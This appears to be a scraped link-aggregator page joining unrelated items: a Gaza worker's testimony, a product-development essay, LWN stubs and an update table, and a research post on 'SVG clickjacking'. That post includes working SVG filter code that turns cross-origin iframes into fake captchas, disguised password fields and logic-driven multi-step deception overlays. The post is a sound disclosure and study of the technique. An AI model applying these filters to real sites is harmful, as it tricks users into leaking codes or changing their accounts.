“They tied our hands behind our backs and blindfolded us before beating us,” he recalled. “They took us to the Israeli settlement of Kiryat Arba and from there to another prison that they didn’t disclose. For nine days, we endured tortuous interrogations. Every day, they asked different questions about Gaza. I told them I’m just a worker.”

He was once again transferred to another prison for a day — and in the dead of night, he and several other workers were dumped at the border with Gaza. They all entered the Strip by foot.

“I was in the south and couldn’t go back to Gaza City,” he said. “I couldn’t bury my wife and children. I couldn’t say goodbye to them.”

It took 20 days for him to be reunited with his son. They moved into a tattered tent that flooded with the recent winter storms.

He said that, working in Israel, he had been able to save over $10,000.

“It’s all gone now,” the man said. “I only have four shekels” — about $1 — “in my pocket. I used to be able to work and provide for my family. But now, there is no life.”

How to work with Product: Taste and Adjust

Lobsters
blog.nilenso.com
2025-12-04 14:43:45
Comments...
Original Article

Eh! All of you, come here! Taste it! Taste it! Taste it! Taste it!

Gordon Ramsay

If you want to cook a great dish, you’ve got to taste it every step of the way. Taste the ingredients you buy, the components you prepare, and the spices and seasonings. If you can’t taste it, you smell it, feel it, or listen to it. And then you adjust. Taste and adjust until you create a dish you like.

“Taste and adjust” is a form of continuous improvement applied to the creation of food. The hallmark methodologies of the scientific method , Kaizen , TPS , PDCA , TDD , design sprints , or extreme programming , that have led to some of humanity’s best creations, are all forms of continuous improvement. At their core is this principle:

Creators need an immediate connection to what they’re creating.

Bret Victor, Inventing on Principle

Bret Victor says that “working in the head doesn’t scale” , and that understanding comes from seeing data, flow, and state directly . When building products, can you see the data, flow, and state directly? Can you “taste” your product every step to ensure it’s exactly what you and your users want?

The chef's line-tasting (our flywheel, harness, environment, or feedback loop) is the framework in which we apply this principle to product creation. The product and engineering functions must build and maintain this flywheel together, every step of the way.

[Figure: taste-and-adjust]

The product development flywheel

To build the flywheel, we ask:

  • “What is the simplest experiment I can run to validate this hypothesis?”, and then
  • “What do I need to run this experiment?”

The machinery that enables running such experiments frequently and quickly is the flywheel.

It could be in the form of an operator’s console that allows product to tweak config on the fly, or building a prototype, or a feature-flag allowing tests with beta-users, or publishing a new metric that removes a blind spot. Even unit tests that verify whether the code does what product intends are part of this flywheel.

While this seems like a simple enough principle to apply, in reality, we are faced with the inherent complexity of working with many people, roles, and tools. A typical product development lifecycle (PDLC) looks like the abstract machine shown below. Each phase has controls and measurements around specific feedback loops (such as Idea ⇄ User), and the phases are interconnected through reinforcing and balancing information channels.

[Figure: product-development-flywheel]

Here’s a list of some ways to “taste” at each phase, and a healthy level of involvement of product and engineering in each of them.

  1. Explore (Idea ⇄ User): Pen + Paper, User Research, Design Sprints, Landing Pages, Campaigns. Involvement: 90% Product, 10% Engineering.
  2. Validate (Hypothesis ⇄ User): Wireframes, Prototypes, Proofs of Concept. Involvement: 70% Product, 30% Engineering.
  3. Plan (Idea ⇄ Spec): Thin slices of work, Experiments, Spikes, Tracer Bullets. Involvement: 50% Product, 50% Engineering.
  4. Develop (Spec ⇄ Code): TDD, Types, Compilation, REPL, AI Assisted Coding. Involvement: 10% Product, 90% Engineering.
  5. Integrate and release (Code ⇄ Product): Previews, Devboxes, Staging, Integration, Quality Analysis. Involvement: 30% Product, 70% Engineering.
  6. Operate (Product ⇄ User): Product Observability, Operator Consoles, Alerts. Involvement: 50% Product, 50% Engineering.

Fine-Tuning the Flywheel

  • Get end-to-end product builders: You want teams that go together from phase 1 to 6, and then around again, to close the loop on their creation. Look for roles siloed in fewer phases, and work to involve them in all phases.
  • Get involved early: Phases 1 and 2 are the ideation phase, and the most important thing to do here is to listen, and understand the problem deeply. I wrote about this earlier in the series . Building this phase of the flywheel for new products is cheap, especially with vibe coding. However, keeping experimentation costs low as the product matures can be challenging. Work to keep experiments cheap by using feature flags, or by maintaining experimental or forked versions of applications.
  • Get closer to the user: Phases 3, 4, and 5 make up the typical SDLC (software development lifecycle), and in my experience, engineering is less involved in phases 1, 2 and 6. This is unfortunate because phases 1, 2, and 6 interface with the user and house the most important feedback loops.
  • Planning > Speed: Development (phase 4) is arguably the most expensive part of most tech companies. While there’s a lot of focus on making development faster to reduce costs, reducing work through planning (phase 3) is far more effective. Break down problems, find thin slices of work to serve, and prioritise ruthlessly.
  • Close outer feedback loops: Phase 6 should close the loop on business goals through product observability, in addition to the local feedback loops of individual features or initiatives.

Stronger flywheel ⇒ Immediate connection ⇒ Better product

So, review your flywheel periodically. Lubricate the gears, and tighten the feedback loops. Ultimately, ensure that everyone on the team feels empowered to stop the line, take a spoonful, and say, “Needs more salt.”

The NYPD Ignored NYC's Sanctuary Laws

hellgate
hellgatenyc.com
2025-12-04 14:42:39
And more links to start your day....
Original Article


[$] A "frozen" dictionary for Python

Linux Weekly News
lwn.net
2025-12-04 14:42:12
Dictionaries are ubiquitous in Python code; they are the data structure of choice for a wide variety of tasks. But dictionaries are mutable, which makes them problematic for sharing data in concurrent code. Python has added various concurrency features to the language over the last decade or so—as...
Original Article

The page you have tried to view ( A "frozen" dictionary for Python ) is currently available to LWN subscribers only.

Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on December 18, 2025)

cmocka 2.0 released

Linux Weekly News
lwn.net
2025-12-04 14:09:54
Andreas Schneider has announced version 2.0 of the cmocka unit-testing framework for C: This release represents a major modernization effort, bringing cmocka firmly into the "modern" C99 era while maintaining the simplicity and ease of use that users have come to expect. One of the most significa...
Original Article

Andreas Schneider has announced version 2.0 of the cmocka unit-testing framework for C:

This release represents a major modernization effort, bringing cmocka firmly into the "modern" C99 era while maintaining the simplicity and ease of use that users have come to expect.

One of the most significant changes in cmocka 2.0 is the migration to C99 standard integer types. The LargestIntegralType typedef has been replaced with intmax_t and uintmax_t from stdint.h, providing better type safety and portability across different platforms. Additionally, we've adopted the bool type where appropriate, making the code more expressive and self-documenting.

Using intmax_t and uintmax_t also allows to print better error messages. So you can now find e.g. assert_int_equal and assert_uint_equal .

cmocka 2.0 introduces a comprehensive set of type-specific assertion macros, including `assert_uint_equal()`, `assert_float_equal()`, and enhanced pointer assertions. The mocking system has also been significantly improved with type-specific macros like `will_return_int()` and `will_return_float()`. The same for parameter checking etc.

LWN covered the project early in its development in 2013. See the full list of new features, enhancements, and bug fixes in cmocka 2.0 in the changelog .



Security updates for Thursday

Linux Weekly News
lwn.net
2025-12-04 14:07:15
Security updates have been issued by AlmaLinux (expat and libxml2), Debian (openvpn and webkit2gtk), Fedora (gi-loadouts, kf6-kcoreaddons, kf6-kguiaddons, kf6-kjobwidgets, kf6-knotifications, kf6-kstatusnotifieritem, kf6-kunitconversion, kf6-kwidgetsaddons, kf6-kxmlgui, nanovna-saver, persepolis, py...
Original Article
Dist. ID Release Package Date
AlmaLinux ALSA-2025:22175 9 expat 2025-12-03
AlmaLinux ALSA-2025:22376 9 libxml2 2025-12-03
Debian DSA-6069-1 stable openvpn 2025-12-03
Debian DLA-4394-1 LTS webkit2gtk 2025-12-04
Debian DSA-6070-1 stable webkit2gtk 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 gi-loadouts 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kcoreaddons 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kguiaddons 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kjobwidgets 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-knotifications 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kstatusnotifieritem 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kunitconversion 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kwidgetsaddons 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 kf6-kxmlgui 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 nanovna-saver 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 persepolis 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 python-ezdxf 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 python-pyside6 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 sigil 2025-12-04
Fedora FEDORA-2025-7ea43a29f2 F42 stb 2025-12-04
Fedora FEDORA-2025-55bbd18c79 F43 stb 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 syncplay 2025-12-04
Fedora FEDORA-2025-72fbf180c7 F43 tinyproxy 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 torbrowser-launcher 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 ubertooth 2025-12-04
Fedora FEDORA-2025-073e4f7991 F42 usd 2025-12-04
Fedora FEDORA-2025-0cc929ff17 F43 usd 2025-12-04
Mageia MGASA-2025-0315 9 cups 2025-12-03
SUSE openSUSE-SU-2025:0458-1 osB15 Security 2025-12-04
SUSE SUSE-SU-2025:4319-1 SLE15 SLE-m5.2 SLE-m5.3 SLE-m5.4 SLE-m5.5 oS15.6 cups 2025-12-03
SUSE openSUSE-SU-2025:15793-1 TW gegl 2025-12-03
SUSE openSUSE-SU-2025:0457-1 osB15 icinga2 2025-12-04
SUSE openSUSE-SU-2025-20135-1 oS16.0 mozjs128 2025-12-04
Ubuntu USN-7904-1 16.04 18.04 20.04 ghostscript 2025-12-03
Ubuntu USN-7911-1 14.04 kernel 2025-12-04
Ubuntu USN-7909-1 20.04 22.04 linux, linux-aws, linux-aws-5.15, linux-gcp-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-oracle-5.15, linux-xilinx-zynqmp 2025-12-04
Ubuntu USN-7907-1 16.04 18.04 linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle 2025-12-03
Ubuntu USN-7909-3 22.04 linux-aws-fips, linux-fips, linux-gcp-fips 2025-12-04
Ubuntu USN-7907-2 18.04 linux-aws-fips, linux-fips 2025-12-03
Ubuntu USN-7910-1 22.04 linux-azure-fips 2025-12-04
Ubuntu USN-7907-3 16.04 18.04 linux-gcp, linux-gcp-4.15, linux-hwe 2025-12-04
Ubuntu USN-7889-4 22.04 24.04 linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop 2025-12-04
Ubuntu USN-7879-4 24.04 25.04 linux-gcp-6.14, linux-raspi 2025-12-04
Ubuntu USN-7907-4 18.04 linux-gcp-fips 2025-12-04
Ubuntu USN-7909-2 22.04 linux-intel-iot-realtime, linux-realtime 2025-12-04
Ubuntu USN-7861-5 24.04 linux-raspi, linux-raspi-realtime, linux-xilinx 2025-12-03
Ubuntu USN-7908-1 22.04 24.04 25.04 25.10 postgresql-14, postgresql-16, postgresql-17 2025-12-03

SVG Filters - Clickjacking 2.0

Lobsters
lyra.horse
2025-12-04 14:04:13
Comments...
Original Article

Clickjacking is a classic attack that consists of covering up an iframe of some other website in an attempt to trick the user into unintentionally interacting with it. It works great if you need to trick someone into pressing a button or two, but for anything more complicated it’s kind of unrealistic.

I’ve discovered a new technique that turns classic clickjacking on its head and enables the creation of complex interactive clickjacking attacks, as well as multiple forms of data exfiltration.

I call this technique “ SVG clickjacking ”.

Liquid SVGs

The day Apple announced its new Liquid Glass redesign was pretty chaotic. You couldn’t go on social media without every other post being about the new design, whether it was critique over how inaccessible it seemed, or awe at how realistic the refraction effects were.

Drowning in the flurry of posts, a thought came to mind - how hard would it be to re-create this effect? Could I do this, on the web, without resorting to canvas and shaders? I got to work, and about an hour later I had a pretty accurate CSS/SVG recreation of the effect 1 .

[Interactive demo: the liquid-glass effect over a music player UI, with tracks by Girls Rituals, acloudyskye, Sound Bandit, Vylet Pony, and Ninajirachi.]

You can drag around the effect with the bottom-right circle control thing in the demo above (chrome/firefox desktop, chrome mobile).

Note: This demo is broken in Safari, sorry.

My little tech demo made quite a splash online, and even resulted in a news article with what is probably the wildest quote about me to date: “Samsung and others have nothing on her” .

A few days passed, and another thought came to mind - would this SVG effect work on top of an iframe?

Like, surely not? The way the effect “refracts light” 2 is way too complex to work on a cross-origin document.

But, to my surprise, it did.

The reason this was so interesting to me is that my liquid glass effect uses the feColorMatrix and feDisplacementMap SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document?

This got me wondering - do any of the other filters work on iframes, and could we turn that into an attack somehow? It turns out that it’s all of them, and yes!
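To make that concrete, here's the minimal pattern every demo below builds on: a CSS filter: url(...) reference pointing an SVG filter at a cross-origin iframe. A sketch, with the framed URL and the invert filter purely illustrative:

<iframe src="https://example.com" style="filter: url(#invert)"></iframe>
<svg width="0" height="0">
  <filter id="invert">
    <!-- difference against solid white inverts the framed page's colors -->
    <feFlood flood-color="#FFF" result="white" />
    <feBlend mode="difference" in="SourceGraphic" in2="white" />
  </filter>
</svg>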

Building blocks

I got to work, going through every <fe*> SVG element and figuring out which ones can be combined to build our own attack primitives.

These filter elements take in one or more input images, apply operations to them, and output a new image. You can chain a bunch of them together within a single SVG filter, and refer to the output of any of the previous filter elements in the chain.

Let's take a look at some of the more useful base elements we can play with (roughly the set the rest of this post leans on):

  • feFlood generates a solid color
  • feTurbulence generates noise
  • feImage pulls an external image into the filter chain
  • feOffset shifts the image around
  • feTile crops a region out of the image, or tiles it across the canvas
  • feMorphology grows or shrinks shapes (dilate/erode)
  • feGaussianBlur blurs
  • feColorMatrix remaps the color channels (including into and out of alpha)
  • feBlend combines two images (difference mode is especially handy)
  • feComposite does per-pixel arithmetic on two images
  • feDisplacementMap moves pixels around based on another image

That's quite a selection of utilities!

If you’re a demoscener 3 you’re probably feeling right at home. These are the fundamental building blocks for many kinds of computer graphics, and they can be combined into many useful primitives of our own. So let’s see some examples.

Fake captcha

I’ll start off with an example of basic data exfiltration. Suppose you’re targeting an iframe that contains some sort of sensitive code. You could ask the user to retype it by itself, but that’d probably seem suspicious.

What we can do instead is make use of feDisplacementMap to make the text seem like a captcha! This way, the user is far more likely to retype the code.

Here is your secret code:

6c79 7261 706f 6e79

Don't share it with anyone!

[Interactive demo: the same code rendered through the captcha filter, framed as a "Complete a captcha: what's written above?" prompt.]

<iframe src="..." style="filter:url(#captchaFilter)"></iframe>
<svg width="768" height="768" viewBox="0 0 768 768" xmlns="http://www.w3.org/2000/svg">
  <filter id="captchaFilter">
    <feTurbulence
      type="turbulence"
      baseFrequency="0.03"
      numOctaves="4"
      result="turbulence" />
    <feDisplacementMap
      in="SourceGraphic"
      in2="turbulence"
      scale="6"
      xChannelSelector="R"
      yChannelSelector="G" />
  </filter>
</svg>

Note: Only the part inside the <filter> block is relevant, the rest is just an example of using filters.

Add to this some color effects and random lines, and you've got a pretty convincing captcha!
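As a rough sketch of those extras (the frequencies and thresholds here are illustrative guesses to tune by eye, not the values from the original demo), we can desaturate the warped text and overlay thresholded noise as fake pen strokes:

<filter id="captchaFilterFancy">
  <!-- warp the text as before -->
  <feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="turb" />
  <feDisplacementMap in="SourceGraphic" in2="turb" scale="6"
                     xChannelSelector="R" yChannelSelector="G" />
  <!-- wash the colors out a little -->
  <feColorMatrix type="saturate" values="0.4" result="washed" />
  <!-- stretch low-frequency noise into horizontal streaks -->
  <feTurbulence type="fractalNoise" baseFrequency="0.005 0.1" numOctaves="1" result="noise" />
  <!-- threshold the noise's red channel into the alpha of a black stroke layer -->
  <feColorMatrix in="noise" type="matrix"
                 values="0 0 0 0 0
                         0 0 0 0 0
                         0 0 0 0 0
                         20 0 0 0 -17" result="strokes" />
  <!-- draw the strokes over the warped, washed-out text -->
  <feBlend in="strokes" in2="washed" />
</filter>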

Out of all the attack primitives I’ll be sharing, this one is probably the least useful as sites rarely allow you to frame pages giving out magic secret codes. I wanted to show it though, as it’s a pretty simple introduction to the attack technique.

)]}' [[1337],[1,"AIzaSyAtbm8sIHRoaXMgaXNuJ3QgcmVhbCBsb2w",0,"a",30],[768972,768973,768932,768984,768972,768969,768982,768969,768932,768958,768951],[105,1752133733,7958389,435644166009,7628901,32481100117144691,28526,28025,1651273575,15411]]

Still, it could come in handy, because oftentimes you're allowed to frame read-only API endpoints, so maybe there's an attack there to discover.

Grey text hiding

The next example is for situations where you want to trick someone into, for example, interacting with a text input. Oftentimes the inputs have stuff like grey placeholder text in them, so showing the input box by itself won’t cut it.

Let’s take a look at our example target (try typing in the box).

Set a new p​assword

too short

In this example we want to trick the user into setting an attacker-known password, so we want them to be able to see the text they’re entering, but not the grey placeholder text, nor the red “too short” text.

Let's start off by using feComposite with arithmetics to make the grey text disappear. The arithmetic operation takes in two images, i1 ( in=... ) and i2 ( in2=... ), and lets us do per-pixel maths with k1 , k2 , k3 , k4 as the arguments according to this formula: r = k1·i1·i2 + k2·i1 + k3·i2 + k4 4 . With k2=4 and the other arguments at zero, a mid-grey pixel gets multiplied past 1 and clamps to pure white, while black text at 0 stays black.

<feComposite operator=arithmetic
             k1=0 k2=4 k3=0 k4=0 />

Tip! You can leave out the in/in2 parameters if you just want it to be the previous output.

It’s getting there - by multiplying the brightness of the input we’ve made the grey text disappear, but now the black text looks a little suspicious and hard to read, especially on 1x scaling displays.

We could play around with the arguments to find the perfect balance between hiding the grey text and showing the black one, but ideally we'd still have the black text look the way it usually does, just without any grey text. Is that possible?

So here's where a really cool technique comes into play - masking. We're going to create a matte to "cut out" the black text and cover up everything else. It's going to take us quite a few steps to get to the desired result, so let's go through it bit-by-bit.

We start off by cropping the result of our black text filter with feTile .

<feTile x=20 y=56 width=184 height=22 />

Note: Safari seems to be having some trouble with feTile , so if the examples flicker or look blank, read this post in a browser such as Firefox or Chrome. If you're writing an attack for Safari, you can also achieve cropping by making a luma matte with feFlood and then applying it.

Then we use feMorphology to increase the thickness of the text.

<feMorphology operator=erode radius=3 result=thick />

Now we have to increase the contrast of the mask. I'm going to do it by first using feFlood to create a solid white image, which we can then feBlend with difference to invert our mask. And then we can use feComposite to multiply the mask for better contrast 5 .

<feFlood flood-color=#FFF result=white />
<feBlend mode=difference in=thick in2=white />
<feComposite operator=arithmetic k2=100 />

We have a luma matte now! All that’s left is to convert it into an alpha matte with feColorMatrix , apply it to the source image with feComposite , and make the background white with feBlend .

<feColorMatrix type=matrix
        values="0 0 0 0 0
                0 0 0 0 0
                0 0 0 0 0
                0 0 1 0 0" />
<feComposite in=SourceGraphic operator=in />
<feBlend in2=white />

Looks pretty good, doesn’t it! If you empty out the box (try it!) you might notice some artifacts that give away what we’ve done, but apart from that it’s a pretty good way to sort of sculpt and form various inputs around a bit for an attack.

There are all sorts of other effects you can add to make the input seem just right. Let’s combine everything together into a complete example of an attack.

Enter your e-mail address:

<filter>
  <feComposite operator=arithmetic
               k1=0 k2=4 k3=0 k4=0 />
  <feTile x=20 y=56 width=184 height=22 />
  <feMorphology operator=erode radius=3 result=thick />
  <feFlood flood-color=#FFF result=white />
  <feBlend mode=difference in=thick in2=white />
  <feComposite operator=arithmetic k2=100 />
  <feColorMatrix type=matrix
      values="0 0 0 0 0
              0 0 0 0 0
              0 0 0 0 0
              0 0 1 0 0" />
  <feComposite in=SourceGraphic operator=in />
  <feTile x=21 y=57 width=182 height=20 />
  <feBlend in2=white />
  <feBlend mode=difference in2=white />
  <feComposite operator=arithmetic k2=1 k4=0.02 />
</filter>

You can see how the textbox is entirely recontextualized now to fit a different design while still being fully functional.

Pixel reading

And now we come to what is most likely the most useful attack primitive - pixel reading. That’s right, you can use SVG filters to read color data off of images and perform all sorts of logic on them to create really advanced and convincing attacks.

The catch is of course, that you’ll have to do everything within SVG filters - there is no way to get the data out 6 . Despite that, it is very powerful if you get creative with it.

On a higher level, what this lets us do is make everything in a clickjacking attack responsive - fake buttons can have hover effects, pressing them can show fake dropdowns and dialogs, and we can even have fake form validation.

Let’s start off with a simple example - detecting if a pixel is pure black, and using it to turn another filter on or off.

<--- very cool! click to change color

For this target, we want to detect when the user clicks on the box to change its color, and use that to toggle a blur effect.

All the examples from here onwards are broken on Safari. Use Firefox or Chrome if you don't see them.

<feTile x="50" y="50"
        width="4" height="4" />
<feTile x="0" y="0"
        width="100%" height="100%" />

Let’s start off by using two copies of the feTile filter to first crop out the few pixels we’re interested in and then tile those pixels across the entire image.

The result is that we now have the entire screen filled with the color of the area we are interested in.

<feComposite operator=arithmetic k2=100 />

We can turn this result into a binary on/off value by using feComposite 's arithmetic the same way as in the last section, but with a way larger k2 value. This makes it so that the output image is either completely black or completely white: with k2=100, anything even slightly brighter than pure black saturates to full white.

<--- very cool! click to change color

<feColorMatrix type=matrix
  values="0 0 0 0 0
          0 0 0 0 0
          0 0 0 0 0
          0 0 1 0 0" result=mask />
<feGaussianBlur in=SourceGraphic
                stdDeviation=3 />
<feComposite operator=in in2=mask />
<feBlend in2=SourceGraphic />

And just as before, this can be used as a mask. We once again convert it into an alpha matte, but this time apply it to the blur filter.

So that’s how you can find out whether a pixel is black and use that to toggle a filter!
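Putting the three steps together, the whole toggle sketches out to one filter (same coordinates, threshold, and blur radius as in the snippets above):

<filter id="blurToggle">
  <!-- 1. sample the pixels of interest and tile them across the image -->
  <feTile in="SourceGraphic" x="50" y="50" width="4" height="4" />
  <feTile x="0" y="0" width="100%" height="100%" />
  <!-- 2. binarize: anything brighter than pure black saturates to white -->
  <feComposite operator="arithmetic" k2="100" />
  <!-- 3. turn that into an alpha matte and gate the blur with it -->
  <feColorMatrix type="matrix"
                 values="0 0 0 0 0
                         0 0 0 0 0
                         0 0 0 0 0
                         0 0 1 0 0" result="mask" />
  <feGaussianBlur in="SourceGraphic" stdDeviation="3" />
  <feComposite operator="in" in2="mask" />
  <feBlend in2="SourceGraphic" />
</filter>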

Uh oh! It seems that somebody has changed the target to have a pride-themed button instead!

How can we adapt this technique to work with arbitrary colors and textures?

<!-- crop to first stripe of the flag -->
<feTile x="22" y="22"
        width="4" height="4" />
<feTile x="0" y="0" result="col"
        width="100%" height="100%" />
<!-- generate a color to diff against -->
<feFlood flood-color="#5BCFFA"
         result="blue" />
<feBlend mode="difference"
         in="col" in2="blue" />
<!-- k4 is for more lenient threshold -->
<feComposite operator=arithmetic
             k2=100 k4=-5 />
<!-- do the masking and blur stuff... -->
...

The solution is pretty simple - we can simply use feBlend ’s difference combined with a feColorMatrix to join the color channels to turn the image into a similar black/white matte as before. For textures we can use feImage , and for non-exact colors we can use a bit of feComposite ’s arithmetic to make the matching threshold more lenient.

And that’s it, a simple example of how we can read a pixel value and use it to toggle a filter.

Logic gates

But here’s the part where it gets fun! We can repeat the pixel-reading process to read out multiple pixels, and then run logic on them to program an attack.

By using feBlend and feComposite , we can recreate all logic gates and make SVG filters functionally complete . This means that we can program anything we want, as long as it is not timing-based 7 and doesn’t take up too many resources 8 .

NOT:
<feBlend mode=difference in2=white />

AND:
<feComposite operator=arithmetic k1=1 />

OR:
<feComposite operator=arithmetic k2=1 k3=1 />

XOR:
<feBlend mode=difference in=a in2=b />

NAND:
(AND + NOT)

NOR:
(OR + NOT)

XNOR:
(XOR + NOT)
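To make the chaining concrete: NAND, for example, is just the AND arithmetic fed into the white-difference inversion, where a and b are pixel reads that have already been binarized with the feTile trick from earlier:

<feFlood flood-color="#FFF" result="white" />
<feComposite operator="arithmetic" k1="1" in="a" in2="b" />
<feBlend mode="difference" in2="white" />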

These logic gates are what modern computers are made of. You could build a computer within an SVG filter if you wanted to. In fact, here’s a basic calculator I made:

This is a full adder circuit. The filter implements S = A ⊕ B ⊕ Cin for the sum output and Cout = (A ∧ B) ∨ (Cin ∧ (A ⊕ B)) for the carry bit, using the logic gates described above. There are more efficient ways to implement an adder in SVG filters, but this is meant to serve as proof of the ability to implement arbitrary logic circuits.

<!-- util -->
<feOffset in="SourceGraphic" dx="0" dy="0" result=src />
<feTile x="16px" y="16px" width="4" height="4" in=src />
<feTile x="0" y="0" width="100%" height="100%" result=a />
<feTile x="48px" y="16px" width="4" height="4" in=src />
<feTile x="0" y="0" width="100%" height="100%" result=b />
<feTile x="72px" y="16px" width="4" height="4" in=src />
<feTile x="0" y="0" width="100%" height="100%" result=c />
<feFlood flood-color=#FFF result=white />
<!-- A ⊕ B -->
<feBlend mode=difference in=a in2=b result=ab />
<!-- [A ⊕ B] ⊕ C -->
<feBlend mode=difference in2=c />
<!-- Save result to 'out' -->
<feTile x="96px" y="0px" width="32" height="32" result=out />
<!-- C ∧ [A ⊕ B] -->
<feComposite operator=arithmetic k1=1 in=ab in2=c result=abc />
<!-- (A ∧ B) -->
<feComposite operator=arithmetic k1=1 in=a in2=b />
<!-- [A ∧ B] ∨ [C ∧ (A ⊕ B)] -->
<feComposite operator=arithmetic k2=1 k3=1 in2=abc />
<!-- Save result to 'carry' -->
<feTile x="64px" y="32px" width="32" height="32" result=carry />
<!-- Combine results -->
<feBlend in2=out />
<feBlend in2=src result=done />
<!-- Shift first row to last -->
<feTile x="0" y="0" width="100%" height="32" />
<feTile x="0" y="0" width="100%" height="100%" result=lastrow />
<feOffset dx="0" dy="-32" in=done />
<feBlend in2=lastrow />
<!-- Crop to output -->
<feTile x="0" y="0" width="100%" height="100%" />

Anyways, for an attacker, what all of this means is that you can make a multi-step clickjacking attack with lots of conditions and interactivity. And you can run logic on data from cross-origin frames.

Securify

Welcome to this secure application!

This is an example target where we want to trick the user into marking themselves as hacked, which requires a few steps:

  • Clicking a button to open a dialog
  • Waiting for the dialog to load
  • Clicking a checkbox within the dialog
  • Clicking another button in the dialog
  • Checking for the red text that appeared

Securify

Welcome to this secure application!

Win free iPod by following the steps below.

1. Click here

2. Wait 3 seconds

3. Click

4. Click here

A traditional clickjacking attack against this target would be difficult to pull off. You’d need to have the user click on multiple buttons in a row with no feedback in the UI.

There are some tricks you could do to make a traditional attack more convincing than what you see above, but it’s still gonna look sketch af. And the moment you throw something like a text input into the mix, it’s just not gonna work.

Anyways, let’s build out a logic tree for a filter-based attack:

  • Is the dialog open?
    • (No) Is the red text present?
      • (No) Make the user press the button
      • (Yes) Show the end screen
    • (Yes) Is the dialog loaded?
      • (No) Show loading screen
      • (Yes) Is the checkbox checked?
        • (No) Make the user check the checkbox
        • (Yes) Make the user click the button

Which can be expressed in logic gates 9 as:

  • Inputs
    • D (dialog visible) = check for background dim
    • L (dialog loaded) = check for the button in dialog
    • C (checkbox checked) = check whether the button is blue or grey
    • R (red text visible) = feMorphology and check for red pixels
  • Outputs
    • (¬ D ) ∧ (¬ R ) => button1.png
    • D ∧ (¬ L ) => loading.png
    • D ∧ L ∧ (¬ C ) => checkbox.png
    • D ∧ L ∧ C => button2.png
    • (¬ D ) ∧ R => end.png

And this is how we would implement it in SVG:

<!-- util -->
<feTile x="14px" y="4px" width="4" height="4" in=SourceGraphic />
<feTile x="0" y="0" width="100%" height="100%" />
<feColorMatrix type=matrix result=debugEnabled
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feFlood flood-color=#FFF result=white />
<!-- attack imgs -->
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=button1.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=loading.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=checkbox.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=button2.png></feImage>
<feImage xlink:href="data:..." x=0 y=0 width=420 height=220 result=end.png></feImage>
<!-- D (dialog visible) -->
<feTile x="4px" y="4px" width="4" height="4" in=SourceGraphic />
<feTile x="0" y="0" width="100%" height="100%" />
<feBlend mode=difference in2=white />
<feComposite operator=arithmetic k2=100 k4=-1 result=D />
<!-- L (dialog loaded) -->
<feTile x="313px" y="141px" width="4" height="4" in=SourceGraphic />
<feTile x="0" y="0" width="100%" height="100%" result="dialogBtn" />
<feBlend mode=difference in2=white />
<feComposite operator=arithmetic k2=100 k4=-1 result=L />
<!-- C (checkbox checked) -->
<feFlood flood-color=#0B57D0 />
<feBlend mode=difference in=dialogBtn />
<feComposite operator=arithmetic k2=4 k4=-1 />
<feComposite operator=arithmetic k2=100 k4=-1 />
<feColorMatrix type=matrix
               values="1 1 1 0 0
                       1 1 1 0 0
                       1 1 1 0 0
                       1 1 1 1 0" />
<feBlend mode=difference in2=white result=C />
<!-- R (red text visible) -->
<feMorphology operator=erode radius=3 in=SourceGraphic />
<feTile x="17px" y="150px" width="4" height="4" />
<feTile x="0" y="0" width="100%" height="100%" result=redtext />
<feColorMatrix type=matrix
               values="0 0 1 0 0
                       0 0 0 0 0
                       0 0 0 0 0
                       0 0 1 0 0" />
<feComposite operator=arithmetic k2=2 k3=-5 in=redtext />
<feColorMatrix type=matrix result=R
               values="1 0 0 0 0
                       1 0 0 0 0
                       1 0 0 0 0
                       1 0 0 0 1" />
<!-- Attack overlays -->
<feColorMatrix type=matrix in=R
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=end.png operator=in />
<feBlend in2=button1.png />
<feBlend in2=SourceGraphic result=out />
<feColorMatrix type=matrix in=C
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=button2.png operator=in />
<feBlend in2=checkbox.png result=loadedGraphic />
<feColorMatrix type=matrix in=L
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=loadedGraphic operator=in />
<feBlend in2=loading.png result=dialogGraphic />
<feColorMatrix type=matrix in=D
  values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in=dialogGraphic operator=in />
<feBlend in2=out />

Securify

Welcome to this secure application!

